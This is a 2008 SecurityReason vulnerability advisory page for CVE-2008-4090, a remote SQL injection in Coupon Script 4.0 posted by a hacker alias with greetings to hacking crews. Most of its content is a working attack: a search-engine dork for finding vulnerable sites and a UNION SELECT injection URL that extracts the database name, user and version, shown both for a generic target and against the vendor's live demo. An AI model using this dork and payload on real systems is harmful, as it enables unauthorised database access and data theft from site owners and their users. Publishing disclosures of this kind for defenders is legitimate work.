SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Coupon Script 4.0 (id) Remote SQL Injection Vulnerability


Arrow  SecurityAlert : 4260
Arrow  CVE : CVE-2008-4090
Arrow  CWE : CWE-89
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : No
Arrow  Credit : Hussin X
Arrow  Published : 17.09.2008

Arrow  Affected Software : couponscript:coupon_script:4.0



Arrow  Advisory Content :  

|___________________________________________________|
|
| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.couponscript.com/
|
| DorK : inurl:couponsite/index.php?page=
|___________________________________________________|

Exploit:
________



www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select
/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version()
,12,13,14,15,16,17,18,19,20,21,22,23,24/*




L!VE DEMO:
_________


http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/unio
n/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,1
0,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*







____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________


Im IRAQi



Arrow  References :

http://securityreason.com/expldownload/1/4581/1 (Exploit)
http://www.securityfocus.com/bid/30961
http://www.milw0rm.com/exploits/6348




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.